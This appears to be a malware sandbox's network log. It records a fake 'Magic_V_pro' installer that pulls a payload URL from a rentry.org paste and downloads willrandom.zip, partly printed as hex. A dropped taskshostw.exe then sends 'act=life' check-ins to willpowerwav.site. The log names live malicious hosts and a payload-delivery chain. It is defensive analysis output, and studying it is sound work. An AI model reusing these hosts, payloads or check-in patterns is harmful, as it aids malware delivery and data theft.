2025-03-08 02:14:27 UTC	491	IN	Data Raw: 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 6f 72 67 2f 63 63 33 62 61 38 62 36 37 39 63 39 32 36 66 63 39 39 31 31 61 65 64 65 39 30 30 39 65 35 38 39 63 62 64 33 36 36 37 63 34 38 34 33 39 63 36 33 30 34 31 38 64 32 37 66 64 62 62 35 32 66 63 38 2f 72 61 77 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 6f 72 67 2f 63 63 33 62 61 38 62 36 37 39 63 39 32 36 66 63 39 39 31 31 61 65 64 65 39 30 30 39 65 35 38 39 63 62 64 33 36 36 37 63 34 38 34 33 39 63 36 33 30 34 31 38 64 32 37 66 64 62 62 35 32 66 63 38 2f 72 61 77 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e Data Ascii: tent="0;url='https://rentry.org/cc3ba8b679c926fc9911aede9009e589cbd3667c48439c630418d27fdbb52fc8/raw'" /> <title>Redirecting to https://rentry.org/cc3ba8b679c926fc9911aede9009e589cbd3667c48439c630418d27fdbb52fc8/raw</title> </head> <body>
2025-03-08 02:14:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49719	164.132.58.105	443	6800	C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

Timestamp	Bytes transferred	Direction	Data
2025-03-08 02:14:29 UTC	251	OUT	GET /cc3ba8b679c926fc9911aede9009e589cbd3667c48439c630418d27fdbb52fc8/raw HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) rentry-auth: e9700e0e5dfc56e362dbe75f Host: rentry.org
2025-03-08 02:14:30 UTC	316	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 08 Mar 2025 02:14:29 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 43 Connection: close Vary: Origin X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains Cache-Control: Vary
2025-03-08 02:14:30 UTC	43	IN	Data Raw: 68 74 74 70 73 3a 2f 2f 72 65 61 2e 67 72 75 70 6f 6c 61 6c 65 67 69 6f 6e 2e 65 63 2f 77 69 6c 6c 72 61 6e 64 6f 6d 2e 7a 69 70 Data Ascii: https://rea.grupolalegion.ec/willrandom.zip

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49721	190.92.154.206	443	6800	C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

Timestamp	Bytes transferred	Direction	Data
2025-03-08 02:14:32 UTC	159	OUT	HEAD /willrandom.zip HTTP/1.1 Accept: / User-Agent: InnoDownloadPlugin/1.5 Host: rea.grupolalegion.ec Connection: Keep-Alive Cache-Control: no-cache
2025-03-08 02:14:32 UTC	644	IN	HTTP/1.1 200 OK Connection: close x-powered-by: PHP/7.4.33 content-description: File Transfer content-type: application/octet-stream content-disposition: attachment; filename="willrandom.zip" expires: 0 cache-control: must-revalidate pragma: public content-length: 872079 date: Sat, 08 Mar 2025 02:14:32 GMT server: LiteSpeed strict-transport-security: max-age=63072000; includeSubDomains x-frame-options: SAMEORIGIN x-content-type-options: nosniff alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49724	190.92.154.206	443	6800	C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

Timestamp	Bytes transferred	Direction	Data
2025-03-08 02:14:34 UTC	158	OUT	GET /willrandom.zip HTTP/1.1 Accept: / User-Agent: InnoDownloadPlugin/1.5 Host: rea.grupolalegion.ec Connection: Keep-Alive Cache-Control: no-cache
2025-03-08 02:14:34 UTC	644	IN	HTTP/1.1 200 OK Connection: close x-powered-by: PHP/7.4.33 content-description: File Transfer content-type: application/octet-stream content-disposition: attachment; filename="willrandom.zip" expires: 0 cache-control: must-revalidate pragma: public content-length: 872079 date: Sat, 08 Mar 2025 02:14:34 GMT server: LiteSpeed strict-transport-security: max-age=63072000; includeSubDomains x-frame-options: SAMEORIGIN x-content-type-options: nosniff alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2025-03-08 02:14:34 UTC	724	IN	Data Raw: 50 4b 03 04 14 00 01 00 08 00 35 b2 59 5a 5c 8c a1 23 ed 4d 0d 00 00 c8 15 00 0e 00 00 00 77 69 6c 6c 72 61 6e 64 6f 6d 2e 65 78 65 06 25 06 42 e7 aa 5c bd 76 67 d0 85 0a 83 80 0d 12 db a6 01 93 85 4b ea 22 f1 89 66 b3 99 4d d6 93 80 be d3 8c 2f fd 7e 5b ca fa 64 3d 18 7a 40 c1 3c b0 e5 d4 4a 26 f4 f9 d5 1e 31 cc 25 71 3f 51 3d 41 04 0c 87 62 59 b7 3c 29 16 b9 f8 a3 dd 99 9d 9e ff 46 1d f5 4b 69 7b ec 3b 53 69 89 9b bb f4 fa 78 64 18 a8 7c 5b 12 a9 fa 30 26 5f d8 e8 3f aa 5d 99 63 d1 26 61 5a a3 52 3b 05 9e 0b 9e df 5e 2d 08 87 5e 08 19 e6 ff ce 4b a5 87 e1 ed 0b 18 ea 81 39 88 94 b1 84 54 3d f9 df d4 30 24 9a 70 f2 cc 1f e3 3b 5d 9a cf 76 82 8e 2a 2c cd ae 36 0e 84 db 46 e9 fd f8 97 22 18 7d 5b 6e 71 fa 98 54 54 20 09 24 c8 d9 8d 09 35 42 c1 b4 da 88 a8 Data Ascii: PK5YZ\#Mwillrandom.exe%B\vgK"fM/~[d=z@<J&1%q?Q=AbY<)FKi{;Sixd\|[0&_?]c&aZR;^-^K9T=0$p;]v*,6F"}[nqTT $5B
2025-03-08 02:14:35 UTC	14994	IN	Data Raw: 43 7f 9d 3b 1a 76 43 aa 8f cf b5 6c 57 8c 95 55 1a 20 90 f5 b1 0d 2a 85 a6 2c 09 29 db f9 d4 33 6e 59 87 5d 11 c3 5d 2d 51 21 42 e3 e5 2f 21 ba 7d ee a0 76 47 5b 62 99 bc d0 b0 e9 12 e6 1d f9 1b b0 28 fa 3b d7 78 1f 3b 01 f4 8d 47 d2 2b 9f 13 19 e8 cd cf 89 ec 0d cc 75 c4 2f 06 bf 3f 45 c2 a4 42 98 f4 45 64 b7 71 58 32 fe ed 59 50 d9 56 cb 37 16 25 2b 90 49 8b ef 82 6e 6b ab 15 9c ce eb 34 62 bb 98 87 d6 16 12 7f fa 1f 18 d0 a8 e3 71 47 58 2f a9 7c 82 5f 88 19 43 17 5a 87 b0 98 19 e0 83 c4 a2 2e b2 7d 64 b4 20 81 bd 71 7d ef 10 d5 c0 b9 88 d4 57 b0 30 f5 75 99 b8 d8 ba ed 3d 44 79 62 02 1e 94 c2 bf a7 f5 3d 19 1b 15 75 17 b2 2e ea d3 9f d0 81 3a 8f cc 88 6b 10 0d 55 40 6d 3e 9e 75 b6 a7 27 97 cb 8d a7 2a 52 68 2f 93 78 88 c2 54 90 c6 19 ee f2 9b 59 e5 d1 Data Ascii: C;vClWU ,)3nY]]-Q!B/!}vG[b(;x;G+u/?EBEdqX2YPV7%+Ink4bqGX/\|_CZ.}d q}W0u=Dyb=u.:kU@m>u'Rh/xTY
2025-03-08 02:14:35 UTC	16384	IN	Data Raw: 00 56 91 37 0d 7e a5 e9 99 50 ec f0 6b f6 36 b9 7c 79 27 17 31 82 2b 73 7a e5 b4 cc f0 06 b7 6d cb 03 45 34 27 fa 59 34 d2 00 05 b0 c1 29 34 e1 e1 80 49 af 5f a2 d8 a6 3a 16 88 0f 70 3b 35 12 53 0a d5 39 83 6a 09 f3 31 25 de 2e 07 a7 a3 83 e2 1a a0 ef 7d 6b ae 8b 0a 26 06 c6 d7 3a 7e e6 6a 95 26 97 35 33 b9 f7 b2 10 40 8e f0 f7 0c 96 59 00 c8 2c c0 ec 85 e4 7e f1 33 48 92 97 0c c2 d0 57 d7 e0 4f ab 2e 8c 45 c6 07 67 77 a1 44 91 70 ee 74 96 e0 e3 a2 d6 7b 76 ae 04 26 a5 4a cc 8f cd ff 62 3a 07 f9 40 aa 06 b1 b1 e5 f3 eb 5f df 63 e7 6f d3 48 54 e9 87 46 68 c2 3a 9e f6 ab f3 8f 62 b5 11 82 2b 80 31 b9 d6 c0 f3 89 c4 c9 ad 8b 14 26 90 77 7e fc 73 aa 2a 8b fd 17 7a f6 56 b2 91 4b 5a 12 8f 9a b9 a3 0f 1f ed 10 cf eb 91 b1 f5 c8 a6 9f 53 24 16 10 92 2e 84 c4 43 Data Ascii: V7~Pk6\|y'1+szmE4'Y4)4I_:p;5S9j1%.}k&:~j&53@Y,~3HWO.EgwDpt{v&Jb:@_coHTFh:b+1&w~s*zVKZS$.C
2025-03-08 02:14:35 UTC	16384	IN	Data Raw: 95 2a b1 d0 f6 bc 09 10 6b 57 4b 15 ab 31 18 fe ea 78 67 c0 f3 9d 49 b7 e5 2f 82 1b 04 aa fb f6 c9 f9 a7 83 86 3d e6 db b1 8d 1f e8 d9 a9 dc 45 e6 b5 77 21 a8 30 59 71 35 ba d2 34 f1 06 3e d8 bf b3 32 a3 44 28 0a 4f 23 9b ee a5 bd e6 27 6f 67 84 dc 72 53 b4 76 2e 93 5b 3f b1 62 c8 66 f8 20 9c bb c0 ab 62 21 47 19 33 00 3d 8b ab b6 11 cb dc 54 ea 56 ca 08 d1 7c 84 30 d5 0e 1d 30 83 75 5b 75 4b 18 d1 cf 61 62 e7 30 06 43 39 23 73 c4 7b e4 1a 1b 74 39 06 81 32 e5 f1 d4 0d b6 55 d8 97 6f 31 cd 62 ba 32 60 4f fc 44 19 20 be f9 7e 73 ee 3f 36 b7 9e fe 3e 98 06 9c c7 62 76 6b 26 4c 21 b6 42 9c 47 06 db 89 79 31 6e 33 a6 9c a1 cf 59 b4 30 83 0c ca 96 0b 2c 3c 46 a2 c4 c9 95 be 7f 09 94 2e 46 1a d5 05 b2 fe 4b a9 5d ee ef 9f 6f b3 f5 ca f9 c5 59 0f 98 f4 be 1f 11 Data Ascii: *kWK1xgI/=Ew!0Yq54>2D(O#'ogrSv.[?bf b!G3=TV\|00u[uKab0C9#s{t92Uo1b2`OD ~s?6>bvk&L!BGy1n3Y0,<F.FK]oY
2025-03-08 02:14:35 UTC	16384	IN	Data Raw: 71 dd 66 9e 6e eb f7 7d 00 70 39 9a 37 39 ed 9d 99 05 3d 80 d4 b3 f8 b3 4d 77 b7 0d 95 66 1f a4 2e 5c 37 34 95 dd 9f cd 38 3c 26 dd c3 44 01 42 18 b6 85 ff 3f 27 65 08 01 51 02 0f 6b 28 55 8e 3f 80 a3 57 76 2a 98 6c e1 1d 56 17 6a 6d 53 e0 ea 44 33 51 04 a4 1d b0 8b e7 f8 be 2c 78 04 2f ee f2 d4 e1 af 09 72 d6 59 0b 1c 3a b6 d3 33 4a 70 70 3c f9 d9 83 f0 90 cf cc 86 36 c9 db 26 28 b7 6a 51 a6 c1 37 d6 9e c3 56 7c c8 e2 54 31 cf c4 07 39 26 ed 97 b0 b2 20 23 64 41 f8 c7 f4 32 d5 a9 d6 c0 5c a2 e3 82 a3 4f f5 8b e8 23 ec 4f ce 6e 9d c0 44 fe dc 11 17 b5 5a 32 a5 7d 75 76 8a e4 37 ae 67 e8 be 84 8c f4 17 c3 ad b9 25 fd b6 21 9c 45 c5 ea 0e 8f 84 57 05 3e 6d 4e 57 1a c2 83 ac f2 34 dc f5 ec f0 af 10 8a ae 26 2e 95 d0 88 1a 4f dc 31 52 5c d3 c9 ef 08 2b e7 55 Data Ascii: qfn}p979=Mwf.\748<&DB?'eQk(U?Wv*lVjmSD3Q,x/rY:3Jpp<6&(jQ7V\|T19& #dA2\O#OnDZ2}uv7g%!EW>mNW4&.O1R\+U
2025-03-08 02:14:35 UTC	16384	IN	Data Raw: c4 1b 49 7e 34 e7 f2 1b ff 51 81 f5 94 b3 3a a9 8e 51 99 b5 c4 99 e1 7f 66 66 64 ef ec 74 1f c9 e4 fc 99 d6 76 36 df d1 99 28 c4 44 98 82 da 7c f5 36 3c 3c aa df d8 3c 8d 0f eb f6 ec 2b 2f 6e 2f 4a 2b 3c b7 aa 62 48 9f 09 02 f9 03 1b 2f 8f b6 9a 85 18 4c 5d e9 50 1d 9d a5 94 4a fe bd d8 dc 6b f7 d1 2d 25 f4 db 82 17 55 61 a1 1d 53 02 c4 4b 23 53 fd ff 88 24 90 1f 48 62 49 8d 68 2f 0c 46 5b 13 79 02 eb 9e 48 9b 65 d3 03 1c 2f fa ed 04 c6 69 ff 64 7b 2a 85 64 30 4c 61 69 5f b7 b5 1b 3e 09 d2 ad a6 d7 3c b8 d5 45 bb 0d a1 0a 5c f0 b5 47 f7 63 0e 9c 35 dc 3c 4e 48 1c ce 86 f3 80 23 e3 13 53 fd 6b cf 38 50 c4 07 0c 73 c6 32 d6 fb d1 ea 0f 86 27 76 af f3 c8 58 a4 56 05 9d 7d fe 30 0e 02 bf 41 2c f2 a3 97 f8 96 44 35 55 62 2f 91 ed 31 57 4f 52 c7 6d fe 5a 65 ec Data Ascii: I~4Q:Qffdtv6(D\|6<<<+/n/J+<bH/L]PJk-%UaSK#S$HbIh/F[yHe/id{*d0Lai_><E\Gc5<NH#Sk8Ps2'vXV}0A,D5Ub/1WORmZe
2025-03-08 02:14:35 UTC	16384	IN	Data Raw: ff 89 c0 12 70 77 07 96 6f 66 4e a3 86 7a b0 96 95 ca 08 b9 15 0a 7a a8 cc 41 e7 13 50 7b 71 c2 fb 41 5d f4 71 ec 98 69 d1 28 b5 82 2a d2 be ed a9 06 a8 09 84 fa 9c c5 07 10 14 6b e7 22 4c 16 61 7f 3e 3c 20 c9 d4 95 bb 33 f4 ec 8a 10 81 9e b8 a1 96 b5 71 60 5a af 33 07 46 4c 76 ef 3e 7c ed 1d 72 c3 e9 46 93 d1 41 5a e6 83 d7 fd b7 b0 65 16 ea 1c f9 8a 75 b7 79 d6 49 36 23 0c f8 70 8a 00 f0 50 29 8e da 4c 89 37 d2 ce e4 3f c1 a1 50 13 ac 0c d4 03 4f ad 8e 4f da c8 62 ac 08 13 c1 91 b1 c5 6b ab f2 7f 56 4d 66 08 f7 bd f1 5f d0 36 84 f9 52 99 0c ea 11 b3 03 f9 27 6e 9d f1 17 1a ef f4 ac 23 85 ac e1 a4 76 f1 f7 a2 3c ad e4 22 16 53 25 15 75 08 2f ed bb 90 01 e9 7f 1f 3d 7f 7d 98 e3 4c 0b 71 35 91 d6 d4 38 bd aa 64 c3 f8 d5 dc 6f 85 de 6b 6d db 6f be 2e 36 7c Data Ascii: pwofNzzAP{qA]qi(*k"La>< 3q`Z3FLv>\|rFAZeuyI6#pP)L7?POObkVMf_6R'n#v<"S%u/=}Lq58dokmo.6\|
2025-03-08 02:14:35 UTC	16384	IN	Data Raw: 0d bc c3 0a be 7a 1a 97 ed c1 a1 cc ba cf ab 8f d9 41 00 fd ae 4c b6 10 78 44 fc f3 bd 61 2a b6 48 ae d2 79 c6 0c 34 45 5d 31 1b 46 b9 4f 73 0f 22 f2 39 5c 2a a9 bd 5b 72 8d d6 6f 73 a1 f8 78 8c 98 ed 1c f8 15 ed 1e 73 42 0c bc bd 6c bf f1 2d 31 62 ff 7e bb 02 3a 56 6f cf 7f 06 02 dc 9f 75 0f 64 32 5c f9 7d b4 05 36 8a 39 79 67 47 78 15 18 e2 6b ba 4f 6c a7 9e 07 e1 8f de 53 b4 74 59 10 b9 f6 c7 ea 02 4c 03 2f 83 9c 32 4e f8 5c d9 74 fb 85 0d 7f 29 fb 63 44 79 02 fb 3d 77 e3 7f 01 a5 0c 6e 94 bc 19 b3 e4 59 f9 71 8b 70 28 f4 77 58 22 85 3f c4 c0 49 b6 52 10 57 10 e0 17 39 5c 27 67 26 91 37 82 8c ae 3f 08 7e 6a 0b 0f 92 a7 a8 f4 79 29 88 a3 ec 1e 46 b1 71 72 13 f1 1d a2 b9 2a cd ef 3d a0 3b 53 c4 f1 a4 b3 34 0d f5 46 c5 ac 36 eb db c7 d1 b0 13 a8 92 f3 f0 Data Ascii: zALxDaHy4E]1FOs"9\[rosxsBl-1b~:Voud2\}69ygGxkOlStYL/2N\t)cDy=wnYqp(wX"?IRW9\'g&7?~jy)Fqr*=;S4F6
2025-03-08 02:14:35 UTC	16384	IN	Data Raw: 37 0d d2 a7 6b 90 a1 fc 4e ff 86 2e 36 82 77 d8 5d 8c c7 80 be e5 ba 9b c8 e8 1b bf 59 b1 f2 b5 38 84 ef f8 df 2a 14 91 01 a5 35 c7 62 52 69 50 93 2b fa ea 80 2d 27 63 a3 62 5d a1 d7 83 fb 33 96 1c 6d a5 15 3e 94 d2 f5 bb c5 23 32 86 7d a9 ed df 85 a2 7d 4d fb ba f1 fb 05 cd b8 71 1b 9f d2 e3 9e ca 6d 63 f4 70 ae 3f cc 39 dc df 52 61 76 65 9f b8 05 a3 c4 29 97 b2 a2 07 a5 1d c2 fe 39 57 fa 36 be 10 cf 9c 21 25 a5 45 75 01 69 ca 89 b7 13 cb c9 87 42 49 b5 03 39 ee e9 be 32 af 27 bd 68 57 fa 66 83 76 a2 ae ae 57 6d be 19 37 a0 95 5a 0e f3 f7 7e a0 ae 31 bd ad 35 f5 1c c3 73 99 a4 75 0e c1 0f 1c c1 d9 72 f5 b4 b9 2e 68 0d 66 2c 21 45 16 91 77 a3 f2 b3 32 d4 02 60 56 a4 cc 64 4e 87 97 aa a2 61 ca cd e9 79 76 b3 bd 6f df 55 9d d8 78 f9 a0 55 59 1c 35 af d5 8a Data Ascii: 7kN.6w]Y8*5bRiP+-'cb]3m>#2}}Mqmcp?9Rave)9W6!%EuiBI92'hWfvWm7Z~15sur.hf,!Ew2`VdNayvoUxUY5
2025-03-08 02:14:35 UTC	666	IN	Data Raw: 03 f7 6c de ef c6 3d 00 50 b3 d3 af e1 f1 8c 0a d8 f2 b5 6b 9e 3d 47 74 54 16 d5 e9 11 6e aa 27 3c 24 cf 8f a3 52 12 27 ba 44 da 5d 37 db f5 75 7a d9 77 ba 49 39 d1 ad 4d 6e 6e cf 14 ae ef bb 90 ec f2 92 d8 a6 68 39 f8 cb 7c fa 2a 87 7c 15 65 70 bd 8b fd e1 25 26 1c fe 09 da 9d 7e 75 4b 11 fd 4a 6c 12 3d d4 d5 bd dd 99 04 0c da f4 b6 b9 f3 3b b9 c2 14 38 9d f3 f6 80 be 98 14 94 b8 0c d9 ff 0e fd ac f5 c0 38 dd dd 97 c5 6b b0 9e cb a5 6f 53 0c 4e 9c db 1f 09 df d9 ac 28 d3 3b 38 65 76 6f 4e e7 c4 16 ca 6e 87 d4 a0 b7 05 6b 13 90 76 77 6c 65 77 77 9c 55 fc 4a 62 6c 09 b5 4e 29 5c e4 2e b7 58 81 cd f3 fa 81 f4 20 79 85 01 69 29 f2 a3 8c 11 f2 5d 23 b4 c6 5c 8c a5 68 a7 57 50 27 12 7c 29 ca b8 3e 45 da 36 cc 3d d5 5a 93 dc 60 4d ee 45 e3 5a 10 06 b1 29 52 ec Data Ascii: l=Pk=GtTn'<$R'D]7uzwI9Mnnh9\|*\|ep%&~uKJl=;88koSN(;8evoNnkvwlewwUJblN)\.X yi)]#\hWP'\|)>E6=Z`MEZ)R

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49727	172.67.194.165	443	7772	C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-08 02:14:49 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: willpowerwav.site
2025-03-08 02:14:49 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-03-08 02:14:50 UTC	564	IN	HTTP/1.1 403 Forbidden Date: Sat, 08 Mar 2025 02:14:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SJDNiZqPAS9JO10fMDiJ1YvHzS%2BxpmNuK5YO%2BsqbQPiKtTI%2Fgaci1NimzvulzcPDdkPxBFTeqjFJPKWJgz1auCndpQ2opPw8akM4i96k%2Bk0MJLD0pzxdtJ4m2gFvy3%2FDjsjGaw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91ced241b80f9035-BOS
2025-03-08 02:14:50 UTC	805	IN	Data Raw: 31 31 63 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 11c5<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2025-03-08 02:14:50 UTC	1369	IN	Data Raw: 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d Data Ascii: n-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElem
2025-03-08 02:14:50 UTC	1369	IN	Data Raw: 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <for
2025-03-08 02:14:50 UTC	1014	IN	Data Raw: 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 37 31 2e 32 33 35 2e 39 33 2e 31 32 34 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 Data Ascii: " class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">71.235.93.124</span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><spa
2025-03-08 02:14:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49729	172.67.194.165	443	8128	C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-08 02:15:41 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: willpowerwav.site
2025-03-08 02:15:41 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-03-08 02:15:42 UTC	200	IN	HTTP/1.1 403 Forbidden Date: Sat, 08 Mar 2025 02:15:42 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Server: cloudflare CF-RAY: 91ced38809a78f8d-BOS
2025-03-08 02:15:42 UTC	1169	IN	Data Raw: 31 31 37 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 